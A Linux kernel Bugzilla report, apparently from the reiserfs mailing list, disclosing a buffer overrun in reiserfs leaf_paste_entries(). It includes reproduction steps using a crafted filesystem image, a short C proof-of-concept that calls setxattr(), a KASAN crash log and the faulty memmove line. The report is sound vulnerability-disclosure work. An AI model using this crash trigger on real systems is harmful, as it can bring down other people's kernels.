https://bugzilla.kernel.org/show_bug.cgi?id=200353 Bug ID: 200353 Summary: Buffer overrun in leaf_paste_entries() when setxattr() on a file in a reiserfs filesystem Product: File System Version: 2.5 Kernel Version: 4.18 Hardware: All OS: Linux Tree: Mainline Status: NEW Severity: normal Priority: P1 Component: ReiserFS Assignee: reiserfs-devel@xxxxxxxxxxxxxxx Reporter: wen.xu@xxxxxxxxxx Regression: No Created attachment 277007 --> https://bugzilla.kernel.org/attachment.cgi?id=277007&action=edit The (compressed) crafted image which causes crash - Reproduce # mkdir mnt # mount -t reiserfs -o acl,user_xattr 13.img mnt # gcc -o poc poc.c # ./poc ./mnt - POC (poc.c) #define _GNU_SOURCE #include <sys/types.h> #include <sys/mount.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/xattr.h> #include <dirent.h> #include <errno.h> #include <error.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <linux/falloc.h> #include <linux/loop.h> static void activity(char *mpoint) { char *xattr; int err; err = asprintf(&xattr, "%s/foo/bar/xattr", mpoint); // xattr char buf2[113]; memset(buf2, 0, sizeof(buf2)); setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_CREATE); } int main(int argc, char *argv[]) { activity(argv[1]); return 0; } - Kernel message [ 338.456535] ================================================================== [ 338.458262] BUG: KASAN: out-of-bounds in leaf_paste_entries+0x1eb/0x380 [ 338.459816] Read of size 18446744073709551552 at addr ffff8801cbb80e20 by task a.out/1424 [ 338.461695] [ 338.463062] [ 338.463440] The buggy address belongs to the page: [ 338.464546] page:ffffea00072ee000 count:2 mapcount:0 mapping:ffff8801f4563e50 index:0x2013 [ 338.466455] flags: 0x2ffff0000001064(referenced|lru|active|private) [ 338.467834] raw: 02ffff0000001064 ffffea00072f4e08 ffff8801e0aa2430 ffff8801f4563e50 [ 338.469519] raw: 0000000000002013 ffff8801d0b85f18 00000002ffffffff ffff8801e008d500 [ 338.471181] page dumped because: kasan: bad access detected [ 338.472376] page->mem_cgroup:ffff8801e008d500 [ 338.473308] [ 338.473641] Memory state around the buggy address: [ 338.474692] ffff8801cbb80d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 338.476243] ffff8801cbb80d80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 338.477783] >ffff8801cbb80e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 338.479385] ^ [ 338.480314] ffff8801cbb80e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 338.481764] ffff8801cbb80f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 338.483586] ================================================================== [ 338.595067] general protection fault: 0000 [#1] SMP KASAN PTI [ 338.596414] CPU: 0 PID: 1425 Comm: kworker/u4:1 Tainted: G B 4.18.0-rc1+ #8 [ 338.598117] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 338.600172] RIP: 0010:kmem_cache_alloc+0xa9/0x1e0 [ 338.601145] Code: 01 00 00 41 8b 46 20 48 8d 4a 01 49 8b 3e 49 8b 1c 04 4c 89 e0 65 48 0f c7 0f 0f 94 c0 84 c0 74 bb 48 85 db 74 0b 41 8b 46 20 <48> 8b 04 03 0f 18 08 41 f7 c5 00 80 00 00 0f 85 10 01 00 00 8b 15 [ 338.605043] RSP: 0000:ffff8801f308f208 EFLAGS: 00010286 [ 338.606126] RAX: 0000000000000000 RBX: ba60011d0000039f RCX: 0000000000000344 [ 338.607612] RDX: 0000000000000343 RSI: 0000000000480020 RDI: 0000000000032df0 [ 338.609087] RBP: ffff8801f308f238 R08: ffff8801f6e32df0 R09: ffffed003d671872 [ 338.610564] R10: 0000000000000001 R11: ffffed003d671871 R12: ffff8801d0b64268 [ 338.612034] R13: 0000000000480020 R14: ffff8801e678ee00 R15: ffff8801e678ee00 [ 338.613500] FS: 0000000000000000(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000 [ 338.615175] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 338.616368] CR2: 00007f374adcda76 CR3: 00000001ef1f4000 CR4: 00000000000006f0 [ 338.617849] Call Trace: [ 338.618394] ? __es_insert_extent+0x11b/0x590 [ 338.619304] __es_insert_extent+0x11b/0x590 [ 338.620184] ext4_es_insert_extent+0x188/0x2d0 [ 338.621112] ? ext4_es_find_delayed_extent_range+0x2d0/0x2d0 [ 338.622288] ? kasan_check_write+0x14/0x20 [ 338.623165] ? ext4_es_lookup_extent+0x276/0x310 [ 338.624180] ext4_map_blocks+0x4e1/0xa50 [ 338.625023] ? ext4_issue_zeroout+0xa0/0xa0 [ 338.625956] ? add_to_page_cache_locked+0x20/0x20 [ 338.627004] ? unwind_next_frame.part.5+0xa5/0x490 [ 338.628033] ext4_mpage_readpages+0x607/0xcc0 [ 338.628956] ? mpage_end_io+0xd0/0xd0 [ 338.629729] ? __isolate_free_page+0x2a0/0x2a0 [ 338.630695] ? simple_dname+0xb0/0xb0 [ 338.631559] ? __follow_mount_rcu.isra.27+0x3f/0x200 [ 338.632599] ext4_readpages+0x67/0x70 [ 338.633392] read_pages+0x118/0x2d0 [ 338.634139] ? read_cache_pages+0x220/0x220 [ 338.635032] __do_page_cache_readahead+0x300/0x330 [ 338.636031] ? __do_page_cache_readahead+0x300/0x330 [ 338.637067] ? read_pages+0x2d0/0x2d0 [ 338.637841] ? radix_tree_lookup_slot+0x67/0xb0 [ 338.638808] ? __radix_tree_lookup+0x160/0x160 [ 338.639736] ondemand_readahead+0x172/0x440 [ 338.640610] page_cache_sync_readahead+0x5e/0x90 [ 338.641575] generic_file_read_iter+0xcb1/0xff0 [ 338.654447] ? aa_file_perm+0xdb/0x5f0 [ 338.655248] ? filemap_range_has_page+0x170/0x170 [ 338.656231] ? aa_path_link+0x200/0x200 [ 338.657037] ? apparmor_bprm_set_creds+0x52b/0xd40 [ 338.658059] ? ext4_xattr_ibody_get+0x320/0x320 [ 338.659028] ext4_file_read_iter+0xa0/0x170 [ 338.659932] __vfs_read+0x283/0x400 [ 338.660677] ? __x64_sys_copy_file_range+0x380/0x380 [ 338.661733] ? __fsnotify_inode_delete+0x20/0x20 [ 338.662720] ? rw_verify_area+0x78/0x140 [ 338.663552] vfs_read+0xbf/0x1b0 [ 338.664234] kernel_read+0x6e/0xa0 [ 338.664951] prepare_binprm+0x1d5/0x390 [ 338.665754] ? install_exec_creds+0xc0/0xc0 [ 338.666645] ? _cond_resched+0x1a/0x50 [ 338.667434] __do_execve_file.isra.34+0x961/0xe50 [ 338.668413] ? prepare_bprm_creds+0xa0/0xa0 [ 338.669290] do_execve+0x25/0x30 [ 338.670004] call_usermodehelper_exec_async+0x25c/0x270 [ 338.671114] ? umh_complete+0x50/0x50 [ 338.671897] ret_from_fork+0x35/0x40 [ 338.672674] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper crct10dif_pclmul syscopyarea sysfillrect sysimgblt fb_sys_fops ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy [ 338.682823] ---[ end trace 2e85051acb5f6dc1 ]--- [ 338.683802] RIP: 0010:kmem_cache_alloc+0xa9/0x1e0 [ 338.684789] Code: 01 00 00 41 8b 46 20 48 8d 4a 01 49 8b 3e 49 8b 1c 04 4c 89 e0 65 48 0f c7 0f 0f 94 c0 84 c0 74 bb 48 85 db 74 0b 41 8b 46 20 <48> 8b 04 03 0f 18 08 41 f7 c5 00 80 00 00 0f 85 10 01 00 00 8b 15 [ 338.688715] RSP: 0000:ffff8801f308f208 EFLAGS: 00010286 [ 338.689796] RAX: 0000000000000000 RBX: ba60011d0000039f RCX: 0000000000000344 [ 338.691264] RDX: 0000000000000343 RSI: 0000000000480020 RDI: 0000000000032df0 [ 338.692749] RBP: ffff8801f308f238 R08: ffff8801f6e32df0 R09: ffffed003d671872 [ 338.694223] R10: 0000000000000001 R11: ffffed003d671871 R12: ffff8801d0b64268 [ 338.695729] R13: 0000000000480020 R14: ffff8801e678ee00 R15: ffff8801e678ee00 [ 338.697215] FS: 0000000000000000(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000 [ 338.698884] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 338.700090] CR2: 00007f374adcda76 CR3: 00000001ef1f4000 CR4: 00000000000006f0 - Location https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/reiserfs/lbalance.c#L1378 /* prepare space for new entry heads */ deh += before; memmove((char *)(deh + new_entry_count), deh, insert_point - (char *)deh); `size` of memmove is invalid which leads to out-of-bound access during memmove() Reported by Wen Xu (wen.xu@xxxxxxxxxx) from SSLab at Gatech. -- You are receiving this mail because: You are the assignee for the bug.-- To unsubscribe from this list: send the line "unsubscribe reiserfs-devel" in the body of a message to majordomo@xxxxxxxxxxxxxxx More majordomo info at http://vger.kernel.org/majordomo-info.html
